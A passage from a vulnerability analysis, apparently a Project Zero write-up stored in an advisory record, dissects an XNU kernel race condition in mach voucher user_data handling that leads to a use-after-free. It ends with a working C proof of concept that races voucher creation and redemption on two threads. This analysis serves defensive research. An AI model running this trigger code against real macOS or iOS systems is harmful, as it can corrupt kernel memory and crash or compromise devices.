elem->e_size == content_size) {\n\niv_index_t i;\n\n/* and all data matches */\n\nfor (i = 0; i < content_size; i++) {\n\nif (elem->e_data[i] != content[i]) {\n\nbreak;\n\n}\n\n}\n\nif (i < content_size) {\n\ncontinue;\n\n}\n\n/* ... we found a match... */\n\nelem->e_made++;\n\nuser_data_unlock();\n\nif (NULL != alloc) {\n\nkfree(alloc, sizeof(*alloc) + content_size);\n\n}\n\nreturn elem;\n\n}\n\n}\n\nif (NULL == alloc) {\n\nuser_data_unlock();\n\nalloc = (user_data_element_t)kalloc(sizeof(*alloc) + content_size);\n\nalloc->e_made = 1;\n\nalloc->e_size = content_size;\n\nalloc->e_sum = sum;\n\nalloc->e_hash = hash;\n\nmemcpy(alloc->e_data, content, content_size);\n\ngoto retry;\n\n}\n\nqueue_enter(&user_data_bucket[hash], alloc, user_data_element_t, e_hash_link);\n\nuser_data_unlock();\n\nreturn alloc;\n\n} \n \n--- \n \nThe user_data attributes are just uniquified buffer pointers. Each buffer is represented by a user_data_value_element structure, which has a meta-data header followed by a variable-sized inline buffer containing the arbitrary byte data:\n\nstruct user_data_value_element {\n\nmach_voucher_attr_value_reference_t e_made;\n\nmach_voucher_attr_content_size_t e_size;\n\niv_index_t e_sum;\n\niv_index_t e_hash;\n\nqueue_chain_t e_hash_link;\n\nuint8_t e_data[];\n\n}; \n \n--- \n \nPointers to those elements are stored in the user_data_bucket hash table.\n\nuser_data_dedup searches the user_data_bucket hash table to see if a matching user_data_value_element already exists. If not, it allocates one and adds it to the hash table. Note that it's not allowed to hold locks while calling kalloc() so the code first has to drop the user_data lock, allocate a user_data_value_element then take the lock again and check the hash table a second time to ensure that another thread didn't also allocate and insert a matching user_data_value_element while the lock was dropped.\n\nThe e_made field of user_data_value_element is critical to the vulnerability we're eventually going to discuss, so let's examine its use here.\n\nIf a new user_data_value_element is created its e_made field is initialized to 1. If an existing user_data_value_element is found which matches the requested content buffer the e_made field is incremented before a pointer to that user_data_value_element is returned. Redeeming a user_data_value_element (via the MACH_VOUCHER_ATTR_REDEEM command) also just increments the e_made of the element being redeemed before returning it. The type of the e_made field is mach_voucher_attr_value_reference_t so it's tempting to believe that this field is a reference count. The reality is more subtle than that though.\n\nThe first hint that e_made isn't exactly a reference count is that if you search for e_made in XNU you'll notice that it's never decremented. There are also no places where a pointer to that structure is cast to another type which treats the first dword as a reference count. e_made can only ever go up (well technically there's also nothing stopping it overflowing so it can also go down 1 in every 232 increments...)\n\nLet's go back up the stack to the caller of user_data_get_value, ipc_replace_voucher_value:\n\nThe next part is again code for unused functionality. No current voucher attr type implementations return a new_value_voucher so this condition is never true:\n\n/* TODO: value insertion from returned voucher */\n\nif (IV_NULL != new_value_voucher) {\n\niv_release(new_value_voucher);\n\n} \n \n--- \n \nNext, the code needs to wrap new_value in an ivace_entry and determine the index of that ivace_entry in the controller's table of values. This is done by ivace_reference_by_value:\n\n/*\n\n* Find or create a slot in the table associated\n\n* with this attribute value. The ivac reference\n\n* is transferred to a new value, or consumed if\n\n* we find a matching existing value.\n\n*/\n\nval_index = ivace_reference_by_value(ivac, new_value, new_flag);\n\niv_set(voucher, key_index, val_index); \n \n--- \n \n/*\n\n* Look up the values for a given <key, index> pair.\n\n*\n\n* Consumes a reference on the passed voucher control.\n\n* Either it is donated to a newly-created value cache\n\n* or it is released (if we piggy back on an existing\n\n* value cache entry).\n\n*/\n\nstatic iv_index_t\n\nivace_reference_by_value(\n\nipc_voucher_attr_control_t ivac,\n\nmach_voucher_attr_value_handle_t value,\n\nmach_voucher_attr_value_flags_t flag)\n\n{\n\nivac_entry_t ivace = IVACE_NULL;\n\niv_index_t hash_index;\n\niv_index_t index;\n\nif (IVAC_NULL == ivac) {\n\nreturn IV_UNUSED_VALINDEX;\n\n}\n\nivac_lock(ivac);\n\nrestart:\n\nhash_index = IV_HASH_VAL(ivac->ivac_init_table_size, value);\n\nindex = ivac->ivac_table[hash_index].ivace_index;\n\nwhile (index != IV_HASH_END) {\n\nassert(index < ivac->ivac_table_size);\n\nivace = &ivac->ivac_table[index];\n\nassert(!ivace->ivace_free);\n\nif (ivace->ivace_value == value) {\n\nbreak;\n\n}\n\nassert(ivace->ivace_next != index);\n\nindex = ivace->ivace_next;\n\n}\n\n/* found it? */\n\nif (index != IV_HASH_END) {\n\n/* only add reference on non-persistent value */\n\nif (!ivace->ivace_persist) {\n\nivace->ivace_refs++;\n\nivace->ivace_made++;\n\n}\n\nivac_unlock(ivac);\n\nivac_release(ivac);\n\nreturn index;\n\n}\n\n/* insert new entry in the table */\n\nindex = ivac->ivac_freelist;\n\nif (IV_FREELIST_END == index) {\n\n/* freelist empty */\n\nivac_grow_table(ivac);\n\ngoto restart;\n\n}\n\n/* take the entry off the freelist */\n\nivace = &ivac->ivac_table[index];\n\nivac->ivac_freelist = ivace->ivace_next;\n\n/* initialize the new entry */\n\nivace->ivace_value = value;\n\nivace->ivace_refs = 1;\n\nivace->ivace_made = 1;\n\nivace->ivace_free = FALSE;\n\nivace->ivace_persist = (flag & MACH_VOUCHER_ATTR_VALUE_FLAGS_PERSIST) ? TRUE : FALSE;\n\n/* insert the new entry in the proper hash chain */\n\nivace->ivace_next = ivac->ivac_table[hash_index].ivace_index;\n\nivac->ivac_table[hash_index].ivace_index = index;\n\nivac_unlock(ivac);\n\n/* donated passed in ivac reference to new entry */\n\nreturn index;\n\n} \n \n--- \n \nYou'll notice that this code has a very similar structure to user_data_dedup; it needs to do almost exactly the same thing. Under a lock (this time the controller's lock) traverse a hash table looking for a matching value. If one can't be found, allocate a new entry and put the value in the hash table. The same unlock/lock dance is needed, but not every time because ivace's are kept in a table of struct ivac_entry_s's so the lock only needs to be dropped if the table needs to grow.\n\nIf a new entry is allocated (from the freelist of ivac_entry's in the table) then its reference count (ivace_refs) is set to 1, and its ivace_made count is set to 1. If an existing entry is found then both its ivace_refs and ivace_made counts are incremented:\n\nivace->ivace_refs++;\n\nivace->ivace_made++; \n \n--- \n \nFinally, the index of this entry in the table of all the controller's entries is returned, because it's the index into that table which a voucher stores; not a pointer to the ivace.\n\nivace_reference_by_value then calls iv_set to store that index into the correct slot in the voucher's iv_table, which is just a simple array index operation:\n\niv_set(voucher, key_index, val_index); \n \n--- \n \nstatic void\n\niv_set(ipc_voucher_t iv,\n\niv_index_t key_index,\n\niv_index_t value_index)\n\n{\n\nassert(key_index < iv->iv_table_size);\n\niv->iv_table[key_index] = value_index;\n\n} \n \n--- \n \nOur journey following this recipe is almost over! Since we only supplied one sub-recipe we exit the loop in host_create_mach_voucher and reach the call to iv_dedup:\n\nif (KERN_SUCCESS == kr) {\n\n*new_voucher = iv_dedup(voucher); \n \n--- \n \nI won't show the code for iv_dedup here because it's again structurally almost identical to the two other levels of deduping we've examined. In fact it's a little simpler because it can hold the associated hash table lock the whole time (via ivht_lock()) since it doesn't need to allocate anything. If a match is found (that is, the hash table already contains a voucher with exactly the same set of value indexes) then a reference is taken on that existing voucher and a reference is dropped on the voucher we just created from the input recipe via iv_dealloc:\n\niv_dealloc(new_iv, FALSE); \n \n--- \n \nThe FALSE argument here indicates that new_iv isn't in the ivht_bucket hashtable so shouldn't be removed from there if it is going to be destroyed. Vouchers are only added to the hashtable after the deduping process to prevent deduplication happening against incomplete vouchers.\n\nThe final step occurs when host_create_mach_voucher returns. Since this is a MIG method, if it returns success and new_voucher isn't IV_NULL, new_voucher will be converted into a mach port; a send right to which will be given to the userspace caller. This is the final level of deduplication; there can only ever be one mach port representing a particular voucher. This is implemented by the voucher structure's iv_port member.\n\n(For the sake of completeness note that there are actually two userspace interfaces to host_create_mach_voucher; the host port MIG method and also the host_create_mach_voucher_trap mach trap. The trap interface has to emulate the MIG semantics though.)\n\n## Destruction\n\nAlthough I did briefly hint at a vulnerability above we still haven't actually seen enough code to determine that that bug actually has any security consequences. This is where things get complicated ;-)\n\nLet's start with the result of the situation we described above, where we created a voucher port with the following recipe:\n\nstruct udata_dword_recipe {\n\nmach_voucher_attr_recipe_data_t recipe;\n\nuint32_t payload;\n\n};\n\nstruct udata_dword_recipe r = {0};\n\nr.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;\n\nr.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;\n\nr.recipe.content_size = sizeof(uint32_t);\n\nr.payload = 0x41414141; \n \n--- \n \nThis will end up with the following data structures in the kernel:\n\nvoucher_port {\n\nip_kobject = reference-counted pointer to the voucher\n\n}\n\nvoucher {\n\niv_refs = 1;\n\niv_table[6] = reference-counted *index* into user_data controller's ivac_table\n\n}\n\ncontroller {\n\nivace_table[index] =\n\n{\n\nivace_refs = 1;\n\nivace_made = 1;\n\nivace_value = pointer to user_data_value_element\n\n}\n\n}\n\nuser_data_value_element {\n\ne_made = 1;\n\ne_data[] = {0x41, 0x41, 0x41, 0x41}\n\n} \n \n--- \n \nLet's look at what happens when we drop the only send right to the voucher port and the voucher gets deallocated.\n\nWe'll skip analysis of the mach port part; essentially, once all the send rights to the mach port holding a reference to the voucher are deallocated iv_release will get called to drop its reference on the voucher. And if that was the last reference iv_release calls iv_dealloc and we'll pick up the code there:\n\nvoid\n\niv_dealloc(ipc_voucher_t iv, boolean_t unhash) \n \n--- \n \niv_dealloc removes the voucher from the hash table, destroys the mach port associated with the voucher (if there was one) then releases a reference on each value index in the iv_table:\n\nfor (i = 0; i < iv->iv_table_size; i++) {\n\nivace_release(i, iv->iv_table[i]);\n\n} \n \n--- \n \nRecall that the index in the iv_table is the \"key index\", which is one less than the key, which is why i is being passed to ivace_release. The value in iv_table alone is meaningless without knowing under which index it was stored in the iv_table. Here's the start of ivace_release:\n\nstatic void\n\nivace_release(\n\niv_index_t key_index,\n\niv_index_t value_index)\n\n{\n\n...\n\nivgt_lookup(key_index, FALSE, &ivam, &ivac);\n\nivac_lock(ivac);\n\nassert(value_index < ivac->ivac_table_size);\n\nivace = &ivac->ivac_table[value_index];\n\nassert(0 < ivace->ivace_refs);\n\n/* cant release persistent values */\n\nif (ivace->ivace_persist) {\n\nivac_unlock(ivac);\n\nreturn;\n\n}\n\nif (0 < \\--ivace->ivace_refs) {\n\nivac_unlock(ivac);\n\nreturn;\n\n} \n \n--- \n \nFirst they grab references to the attribute manager and controller for the given key index (ivam and ivac), take the ivac lock then take calculate a pointer into the ivac's ivac_table to get a pointer to the ivac_entry corresponding to the value_index to be released.\n\nIf this entry is marked as persistent, then nothing happens, otherwise the ivace_refs field is decremented. If the reference count is still non-zero, they drop the ivac's lock and return. Otherwise, the reference count of this ivac_entry has gone to zero and they will continue on to \"free\" the ivac_entry. As noted before, this isn't going to free the ivac_entry to the zone allocator; the entry is just an entry in an array and in its free state its index is present in a freelist of empty indexes. The code continues thus:\n\nkey = iv_index_to_key(key_index);\n\nassert(MACH_VOUCHER_ATTR_KEY_NONE != key);\n\n/*\n\n* if last return reply is still pending,\n\n* let it handle this later return when\n\n* the previous reply comes in.\n\n*/\n\nif (ivace->ivace_releasing) {\n\nivac_unlock(ivac);\n\nreturn;\n\n}\n\n/* claim releasing */\n\nivace->ivace_releasing = TRUE; \n \n--- \n \niv_index_to_key goes back from the key_index to the key value (which in practice will be 1 greater than the key index.) Then the ivace_entry is marked as \"releasing\". The code continues:\n\nvalue = ivace->ivace_value;\n\nredrive:\n\nassert(value == ivace->ivace_value);\n\nassert(!ivace->ivace_free);\n\nmade = ivace->ivace_made;\n\nivac_unlock(ivac);\n\n/* callout to manager's release_value */\n\nkr = (ivam->ivam_release_value)(ivam, key, value, made);\n\n/* recalculate entry address as table may have changed */\n\nivac_lock(ivac);\n\nivace = &ivac->ivac_table[value_index];\n\nassert(value == ivace->ivace_value);\n\n/*\n\n* new made values raced with this return. If the\n\n* manager OK'ed the prior release, we have to start\n\n* the made numbering over again (pretend the race\n\n* didn't happen). If the entry has zero refs again,\n\n* re-drive the release.\n\n*/\n\nif (ivace->ivace_made != made) {\n\nif (KERN_SUCCESS == kr) {\n\nivace->ivace_made -= made;\n\n}\n\nif (0 == ivace->ivace_refs) {\n\ngoto redrive;\n\n}\n\nivace->ivace_releasing = FALSE;\n\nivac_unlock(ivac);\n\nreturn;\n\n} else { \n \n--- \n \nNote that we enter this snippet with the ivac's lock held. The ivace->ivace_value and ivace->ivace_made values are read under that lock, then the ivac lock is dropped and the attribute managers release_value callback is called:\n\nkr = (ivam->ivam_release_value)(ivam, key, value, made); \n \n--- \n \nHere's the user_data ivam_release_value callback:\n\nstatic kern_return_t\n\nuser_data_release_value(\n\nipc_voucher_attr_manager_t __assert_only manager,\n\nmach_voucher_attr_key_t __assert_only key,\n\nmach_voucher_attr_value_handle_t value,\n\nmach_voucher_attr_value_reference_t sync)\n\n{\n\nuser_data_element_t elem;\n\niv_index_t hash;\n\nassert(&user_data_manager == manager);\n\nUSER_DATA_ASSERT_KEY(key);\n\nelem = (user_data_element_t)value;\n\nhash = elem->e_hash;\n\nuser_data_lock();\n\nif (sync == elem->e_made) {\n\nqueue_remove(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link);\n\nuser_data_unlock();\n\nkfree(elem, sizeof(*elem) + elem->e_size);\n\nreturn KERN_SUCCESS;\n\n}\n\nassert(sync < elem->e_made);\n\nuser_data_unlock();\n\nreturn KERN_FAILURE;\n\n} \n \n--- \n \nUnder the user_data lock (via user_data_lock()) the code checks whether the user_data_value_element's e_made field is equal to the sync value passed in. Looking back at the caller, sync is ivace->ivace_made. If and only if those values are equal does this method remove the user_data_value_element from the hashtable and free it (via kfree) before returning success. If sync isn't equal to e_made, this method returns KERN_FAILURE.\n\nHaving looked at the semantics of user_data_free_value let's look back at the callsite:\n\nredrive:\n\nassert(value == ivace->ivace_value);\n\nassert(!ivace->ivace_free);\n\nmade = ivace->ivace_made;\n\nivac_unlock(ivac);\n\n/* callout to manager's release_value */\n\nkr = (ivam->ivam_release_value)(ivam, key, value, made);\n\n/* recalculate entry address as table may have changed */\n\nivac_lock(ivac);\n\nivace = &ivac->ivac_table[value_index];\n\nassert(value == ivace->ivace_value);\n\n/*\n\n* new made values raced with this return. If the\n\n* manager OK'ed the prior release, we have to start\n\n* the made numbering over again (pretend the race\n\n* didn't happen). If the entry has zero refs again,\n\n* re-drive the release.\n\n*/\n\nif (ivace->ivace_made != made) {\n\nif (KERN_SUCCESS == kr) {\n\nivace->ivace_made -= made;\n\n}\n\nif (0 == ivace->ivace_refs) {\n\ngoto redrive;\n\n}\n\nivace->ivace_releasing = FALSE;\n\nivac_unlock(ivac);\n\nreturn;\n\n} else { \n \n--- \n \nThey grab the ivac's lock again and recalculate a pointer to the ivace (because the table could have been reallocated while the ivac lock was dropped, and only the index into the table would be valid, not a pointer.)\n\nThen things get really weird; if ivace->ivace_made isn't equal to made but user_data_release_value did return KERN_SUCCESS, then they subtract the old value of ivace_made from the current value of ivace_made, and if ivace_refs is 0, they use a goto statement to try to free the user_data_value_element again?\n\nIf that makes complete sense to you at first glance then give yourself a gold star! Because to me at first that logic was completely impenetrable. We will get to the bottom of it though.\n\nWe need to ask the question: under what circumstances will ivace_made and the user_data_value_element's e_made field ever be different? To answer this we need to look back at ipc_voucher_replace_value where the user_data_value_element and ivace are actually allocated:\n\nkr = (ivam->ivam_get_value)(\n\nivam, key, command,\n\nprevious_vals, previous_vals_count,\n\ncontent, content_size,\n\n&new_value, &new_flag, &new_value_voucher);\n\nif (KERN_SUCCESS != kr) {\n\nivac_release(ivac);\n\nreturn kr;\n\n}\n\n... /* WINDOW */\n\nval_index = ivace_reference_by_value(ivac, new_value, new_flag); \n \n--- \n \nWe already looked at this code; if you can't remember what ivam_get_value or ivace_reference_by_value are meant to do, I'd suggest going back and looking at those sections again.\n\nFirstly, ipc_voucher_replace_value itself isn't holding any locks. It does however hold a few references (e.g., on the ivac and ivam.)\n\nuser_data_get_value (the value of ivam->ivam_get_value) only takes the user_data lock (and not in all paths; we'll get to that) and ivace_reference_by_value, which increments ivace->ivace_made does that under the ivac lock.\n\ne_made should therefore always get incremented before any corresponding ivace's ivace_made field. And there is a small window (marked as WINDOW above) where e_made will be larger than the ivace_made field of the ivace which will end up with a pointer to the user_data_value_element. If, in exactly that window shown above, another thread grabs the ivac's lock and drops the last reference (ivace_refs) on the ivace which currently points to that user_data_value_element then we'll encounter one of the more complex situations outlined above where, in ivace_release ivace_made is not equal to the user_data_value_element's e_made field. The reason that there is special treatment of that case is that it's indicating that there is a live pointer to the user_data_value_element which isn't yet accounted for by the ivace, and therefore it's not valid to free the user_data_value_element.\n\nAnother way to view this is that it's a hack around not holding a lock across that window shown above.\n\nWith this insight we can start to unravel the \"redrive\" logic:\n\nif (ivace->ivace_made != made) {\n\nif (KERN_SUCCESS == kr) {\n\nivace->ivace_made -= made;\n\n}\n\nif (0 == ivace->ivace_refs) {\n\ngoto redrive;\n\n}\n\nivace->ivace_releasing = FALSE;\n\nivac_unlock(ivac);\n\nreturn;\n\n} else {\n\n/*\n\n* If the manager returned FAILURE, someone took a\n\n* reference on the value but have not updated the ivace,\n\n* release the lock and return since thread who got\n\n* the new reference will update the ivace and will have\n\n* non-zero reference on the value.\n\n*/\n\nif (KERN_SUCCESS != kr) {\n\nivace->ivace_releasing = FALSE;\n\nivac_unlock(ivac);\n\nreturn;\n\n}\n\n} \n \n--- \n \nLet's take the first case:\n\nmade is the value of ivace->ivace_made before the ivac's lock was dropped and re-acquired. If those are different, it indicates that a race did occur and another thread (or threads) revived this ivace (since even though the refs has gone to zero it hasn't yet been removed by this thread from the ivac's hash table, and even though it's been marked as being released by setting ivace_releasing to TRUE, that doesn't prevent another reference being handed out on a racing thread.)\n\nThere are then two distinct sub-cases:\n\n1) (ivace->ivace_made != made) and (KERN_SUCCESS == kr)\n\nWe can now parse the meaning of this: this ivace was revived but that occurred after the user_data_value_element was freed on this thread. The racing thread then allocated a *new* value which happened to be exactly the same as the ivace_value this ivace has, hence the other thread getting a reference on this ivace before this thread was able to remove it from the ivac's hash table. Note that for the user_data case the ivace_value is a pointer (making this particular case even more unlikely, but not impossible) but it isn't going to always be the case that the value is a pointer; at the ivac layer the ivace_value is actually a 64-bit handle. The user_data attr chooses to store a pointer there.\n\nSo what's happened in this case is that another thread has looked up an ivace for a new ivace_value which happens to collide (due to having a matching pointer, but potentially different buffer contents) with the value that this thread had. I don't think this actually has security implications; but it does take a while to get your head around.\n\nIf this is the case then we've ended up with a pointer to a revived ivace which now, despite having a matching ivace_value, is never-the-less semantically different from the ivace we had when this thread entered this function. The connection between our thread's idea of ivace_made and the ivace_value's e_made has been severed; and we need to remove our thread's contribution to that; hence:\n\nif (ivace->ivace_made != made) {\n\nif (KERN_SUCCESS == kr) {\n\nivace->ivace_made -= made;\n\n} \n \n--- \n \n2) (ivace->ivace_made != made) and (0 == ivace->ivace_refs)\n\nIn this case another thread (or threads) has raced, revived this ivace and then deallocated all their references. Since this thread set ivace_releasing to TRUE the racing thread, after decrementing ivace_refs back to zero encountered this:\n\nif (ivace->ivace_releasing) {\n\nivac_unlock(ivac);\n\nreturn;\n\n} \n \n--- \n \nand returned early from ivace_release, despite having dropped ivace_refs to zero, and it's now this thread's responsibility to continue freeing this ivace:\n\nif (0 == ivace->ivace_refs) {\n\ngoto redrive;\n\n} \n \n--- \n \nYou can see the location of the redrive label in the earlier snippets; it captures a new value from ivace_made before calling out to the attr manager again to try to free the ivace_value.\n\nIf we don't goto redrive then this ivace has been revived and is still alive, therefore all that needs to be done is set ivace_releasing to FALSE and return.\n\nThe conditions under which the other branch is taken is nicely documented in a comment. This is the case when ivace_made is equal to made, yet ivam_release_value didn't return success (so the ivace_value wasn't freed.)\n\n/*\n\n* If the manager returned FAILURE, someone took a\n\n* reference on the value but have not updated the ivace,\n\n* release the lock and return since thread who got\n\n* the new reference will update the ivace and will have\n\n* non-zero reference on the value.\n\n*/ \n \n--- \n \nIn this case, the code again just sets ivace_releasing to FALSE and continues.\n\nPut another way, this comment explaining is exactly what happens when the racing thread was exactly in the region marked WINDOW up above, which is after that thread had incremented e_made on the same user_data_value_element which this ivace has a pointer to in its ivace_value field, but before that thread had looked up this ivace and taken a reference. That's exactly the window another thread needs to hit where it's not correct for this thread to free its user_data_value_element, despite our ivace_refs being 0.\n\n## The bug\n\nHopefully the significance of the user_data_value_element e_made field is now clear. It's not exactly a reference count; in fact it only exists as a kind of band-aid to work around what should be in practice a very rare race condition. But, if its value was wrong, bad things could happen if you tried :)\n\ne_made is only modified in two places: Firstly, in user_data_dedup when a matching user_data_value_element is found in the user_data_bucket hash table:\n\n/* ... we found a match... */\n\nelem->e_made++;\n\nuser_data_unlock(); \n \n--- \n \nThe only other place is in user_data_get_value when handling the MACH_VOUCHER_ATTR_REDEEM command during recipe parsing:\n\nswitch (command) {\n\ncase MACH_VOUCHER_ATTR_REDEEM:\n\n/* redeem of previous values is the value */\n\nif (0 < prev_value_count) {\n\nelem = (user_data_element_t)prev_values[0];\n\nassert(0 < elem->e_made);\n\nelem->e_made++;\n\n*out_value = prev_values[0];\n\nreturn KERN_SUCCESS;\n\n}\n\n/* redeem of default is default */\n\n*out_value = 0;\n\nreturn KERN_SUCCESS; \n \n--- \n \nAs mentioned before, it's up to the attr managers themselves to define the semantics of redeeming a voucher; the entirety of the user_data semantics for voucher redemption are shown above. It simply returns the previous value, with e_made incremented by 1. Recall that *prev_value is either the value which was previously in this under-construction voucher for this key, or the value in the prev_voucher referenced by this sub-recipe.\n\nIf you can't spot the bug above in the user_data MACH_VOUCHER_ATTR_REDEEM code right away that's because it's a bug of omission; it's what's not there that causes the vulnerability, namely that the increment in the MACH_VOUCHER_ATTR_REDEEM case isn't protected by the user_data lock! This increment isn't atomic.\n\nThat means that if the MACH_VOUCHER_ATTR_REDEEM code executes in parallel with either itself on another thread or the elem->e_made++ increment in user_data_dedup on another thread, the two threads can both see the same initial value for e_made, both add one then both write the same value back; incrementing it by one when it should have been incremented by two.\n\nBut remember, e_made isn't a reference count! So actually making something bad happen isn't as simple as just getting the two threads to align such that their increments overlap so that e_made is wrong.\n\nLet's think back to what the purpose of e_made is: it exists solely to ensure that if thread A drops the last ref on an ivace whilst thread B is exactly in the race window shown below, that thread doesn't free new_value on thread B's stack:\n\nkr = (ivam->ivam_get_value)(\n\nivam, key, command,\n\nprevious_vals, previous_vals_count,\n\ncontent, content_size,\n\n&new_value, &new_flag, &new_value_voucher);\n\nif (KERN_SUCCESS != kr) {\n\nivac_release(ivac);\n\nreturn kr;\n\n}\n\n... /* WINDOW */\n\nval_index = ivace_reference_by_value(ivac, new_value, new_flag); \n \n--- \n \nAnd the reason the user_data_value_element doesn't get freed by thread A is because in that window, e_made will always be larger than the ivace->ivace_made value for any ivace which has a pointer to that user_data_value_element. e_made is larger because the e_made increment always happens before any ivace_made increment.\n\nThis is why the absolute value of e_made isn't important; all that matters is whether or not it's equal to ivace_made. And the only purpose of that is to determine whether there's another thread in that window shown above.\n\nSo how can we make something bad happen? Well, let's assume that we successfully trigger the e_made non-atomic increment and end up with a value of e_made which is one less than ivace_made. What does this do to the race window detection logic? It completely flips it! If, in the steady-state e_made is one less than ivace_made then we race two threads; thread A which is dropping the last ivace_ref and thread B which is attempting to revive it and thread B is in the WINDOW shown above then e_made gets incremented before ivace_made, but since e_made started out one lower than ivace_made (due to the successful earlier trigger of the non-atomic increment) then e_made is now exactly equal to ivace_made; the exact condition which indicates we cannot possibly be in the WINDOW shown above, and it's safe to free the user_data_value_element which is in fact live on thread B's stack!\n\nThread B then ends up with a revived ivace with a dangling ivace_value.\n\nThis gives an attacker two primitives that together would be more than sufficient to successfully exploit this bug: the mach_voucher_extract_attr_content voucher port MIG method would allow reading memory through the dangling ivace_value pointer, and deallocating the voucher port would allow a controlled extra kfree of the dangling pointer.\n\nWith the insight that you need to trigger these two race windows (the non-atomic increment to make e_made one too low, then the last-ref vs revive race) it's trivial to write a PoC to demonstrate the issue; simply allocate and deallocate voucher ports on two threads, with at least one of them using a MACH_VOUCHER_ATTR_REDEEM sub-recipe command. Pretty quickly you'll hit the two race conditions correctly.\n\n## Conclusions\n\nIt's interesting to think about how this vulnerability might have been found. Certainly somebody did find it, and trying to figure out how they might have done that can help us improve our vulnerability research techniques. I'll offer four possibilities:\n\n1) Just read the code\n\nPossible, but this vulnerability is quite deep in the code. This would have been a marathon auditing effort to find and determine that it was exploitable. On the other hand this attack surface is reachable from every sandbox making vulnerabilities here very valuable and perhaps worth the investment.\n\n2) Static lock-analysis tooling\n\nThis is something which we've discussed within Project Zero over many afternoon coffee chats: could we build a tool to generate a fuzzy mapping between locks and objects which are probably meant to be protected by those locks, and then list any discrepancies where the lock isn't held? In this particular case e_made is only modified in two places; one time the user_data_lock is held and the other time it isn't. Perhaps tooling isn't even required and this could just be a technique used to help guide auditing towards possible race-condition vulnerabilities.\n\n3) Dynamic lock-analysis tooling\n\nPerhaps tools like [ThreadSanitizer](<https://clang.llvm.org/docs/ThreadSanitizer.html>) could be used to dynamically record a mapping between locks and accessed objects/object fields. Such a tool could plausibly have flagged this race condition under normal system use. The false positive rate of such a tool might be unusably high however.\n\n4) Race-condition fuzzer\n\nIt's not inconceivable that a coverage-guided fuzzer could have generated the proof-of-concept shown below, though it would specifically have to have been built to execute parallel testcases.\n\nAs to what technique was actually used, we don't know. As defenders we need to do a better job making sure that we invest even more effort in all of these possibilities and more.\n\n## PoC:\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <unistd.h>\n\n#include <pthread.h>\n\n#include <mach/mach.h>\n\n#include <mach/mach_voucher.h>\n\n#include <atm/atm_types.h>\n\n#include <voucher/ipc_pthread_priority_types.h>\n\n// @i41nbeer\n\nstatic mach_port_t\n\ncreate_voucher_from_recipe(void* recipe, size_t recipe_size) {\n\nmach_port_t voucher = MACH_PORT_NULL;\n\nkern_return_t kr = host_create_mach_voucher(\n\nmach_host_self(),\n\n(mach_voucher_attr_raw_recipe_array_t)recipe,\n\nrecipe_size,\n\n&voucher);\n\nif (kr != KERN_SUCCESS) {\n\nprintf(\"failed to create voucher from recipe\\n\");\n\n}\n\nreturn voucher;\n\n}\n\nstatic void*\n\ncreate_single_variable_userdata_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {\n\nsize_t recipe_size = (sizeof(mach_voucher_attr_recipe_data_t)) + len;\n\nmach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);\n\nrecipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;\n\nrecipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;\n\nrecipe->content_size = len;\n\nuint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);\n\nmemcpy(content_buf, buf, len);\n\n*template_size_out = recipe_size;\n\nreturn recipe;\n\n}\n\nstatic void*\n\ncreate_single_variable_userdata_then_redeem_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {\n\nsize_t recipe_size = (2*sizeof(mach_voucher_attr_recipe_data_t)) + len;\n\nmach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);\n\nrecipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;\n\nrecipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;\n\nrecipe->content_size = len;\n\nuint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);\n\nmemcpy(content_buf, buf, len);\n\nmach_voucher_attr_recipe_data_t* recipe2 = (mach_voucher_attr_recipe_data_t*)(content_buf + len);\n\nrecipe2->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;\n\nrecipe2->command = MACH_VOUCHER_ATTR_REDEEM;\n\n*template_size_out = recipe_size;\n\nreturn recipe;\n\n}\n\nstruct recipe_template_meta {\n\nvoid* recipe;\n\nsize_t recipe_size;\n\n};\n\nstruct recipe_template_meta single_recipe_template = {};\n\nstruct recipe_template_meta redeem_recipe_template = {};\n\nint iter_limit = 100000;\n\nvoid* s3threadfunc(void* arg) {\n\nstruct recipe_template_meta* template = (struct recipe_template_meta*)arg;\n\nfor (int i = 0; i < iter_limit; i++) {\n\nmach_port_t voucher_port = create_voucher_from_recipe(template->recipe, template->recipe_size);\n\nmach_port_deallocate(mach_task_self(), voucher_port);\n\n}\n\nreturn NULL;\n\n}\n\nvoid sploit_3() {\n\nwhile(1) {\n\n// choose a userdata size:\n\nuint32_t userdata_size = (arc4random() % 2040)+8;\n\nuserdata_size += 7;\n\nuserdata_size &= (~7);\n\nprintf(\"userdata size: 0x%x\\n\", userdata_size);\n\nuint8_t* userdata_buffer = calloc(userdata_size, 1);\n\n((uint32_t*)userdata_buffer)[0] = arc4random();\n\n((uint32_t*)userdata_buffer)[1] = arc4random();\n\n// build the templates: \n\nsingle_recipe_template.recipe = create_single_variable_userdata_voucher_recipe(userdata_buffer, userdata_size, &single_recipe_template.recipe_size);\n\nredeem_recipe_template.recipe = create_single_variable_userdata_then_redeem_voucher_recipe(userdata_buffer, userdata_size, &redeem_recipe_template.recipe_size);\n\nfree(userdata_buffer);\n\npthread_t single_recipe_thread;\n\npthread_create(&single_recipe_thread, NULL, s3threadfunc, (void*)&single_recipe_template);\n\npthread_t redeem_recipe_thread;\n\npthread_create(&redeem_recipe_thread, NULL, s3threadfunc, (void*)&redeem_recipe_template);\n\npthread_join(single_recipe_thread, NULL);\n\npthread_join(redeem_recipe_thread, NULL);\n\nfree(single_recipe_template.recipe);\n\nfree(redeem_recipe_template.recipe);\n\n}\n\n}\n\nint main(int argc, char** argv) {\n\nsploit_3();\n\n} \n \n---\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 